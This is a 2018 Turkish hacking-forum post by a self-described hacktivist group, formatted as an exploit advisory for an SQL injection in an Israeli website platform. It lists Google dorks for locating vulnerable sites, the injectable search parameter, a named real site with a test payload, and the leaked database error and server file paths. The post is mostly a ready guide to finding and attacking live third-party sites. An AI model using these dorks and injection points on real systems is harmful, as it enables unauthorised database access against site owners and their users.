Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: SMSITEנבנה ע״י SmSite.Co.il Israel SQL Injection Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 77 / 100
Rep Sayısı: 2734
Mesaj Sayısı: 6276
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
SMSITEנבנה ע״י SmSite.Co.il Israel SQL Injection Vuln
12.09.2018 19:15
################################################################################​#################

# Exploit Title : SMSITEנבנה ע״י SmSite.Co.il Israel SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : smsite.co.il
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Google Dork :

intext:''SMSITEנבנה ע״י''

intext:''© כל הזכויות שמורות SMSITE''

# Exploit : /search?page=[ID-NUMBER]&cat=[SQL Injection]

################################################################################​#################

# Example Site => executive-israel.co.il/search?page=0&cat=1900' => [ Proof of Concept ] => archive.is/7SCBi

# SQL Database Error =>

LINK ERROR: You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '-20, 20' at line 14
SQL: SELECT `mida_jobs`.`idn`, `mida_jobs`.`name`, `description`, `mida_categories`.
`name` As `cat_name`, `mida_sub_categories`.`name` As `sub_name`, `mida_areas`.`name` As `area_name`
FROM `mida_jobs` LEFT JOIN `mida_categories` ON `mida_jobs`.`category` = `mida_categories`.`idn` LEFT JOIN `mida_sub_categories`
ON `mida_jobs`.`sub_category` = `mida_sub_categories`.`idn` LEFT JOIN `mida_areas` ON `mida_jobs`.`work_area` =
`mida_areas`.`idn` WHERE 1 GROUP BY `mida_jobs`.`idn` ORDER BY `idn` Desc LIMIT -20, 20

Fatal error: Uncaught exception 'Exception' in D:\HostingSpaces\repository\php\db.inc:326 Stack trace: #0
D:\HostingSpaces\repository\php\db.inc(146):
db->failure('SQL ERROR: <br...') #1 D:\HostingSpaces\repository\php\db.inc(186): db->execute('SELECT ?????`mi...') #2
D:\HostingSpaces\repository\php\db.inc(1134): db->query('SELECT ?????`mi...', true, NULL, 1) #3
D:\HostingSpaces\maof1\maof_repository\sections\search\results.inc(130): db->query_object('SELECT ?????`mi...') #4
D:\HostingSpaces\maof1\maof_repository\search.inc(240): require('D:\HostingSpace...') #5
D:\HostingSpaces\maof1\maof_repository\index.inc(33): require('D:\HostingSpace...') #6
D:\HostingSpaces\maof3\executive-israel.co.il\wwwroot\index.php(101): require('D:\HostingSpace...') #7 {main} thrown in
D:\HostingSpaces\repository\php\db.inc on line 326

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 12.09.2018 Tarihinde, Saat: 19:22 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi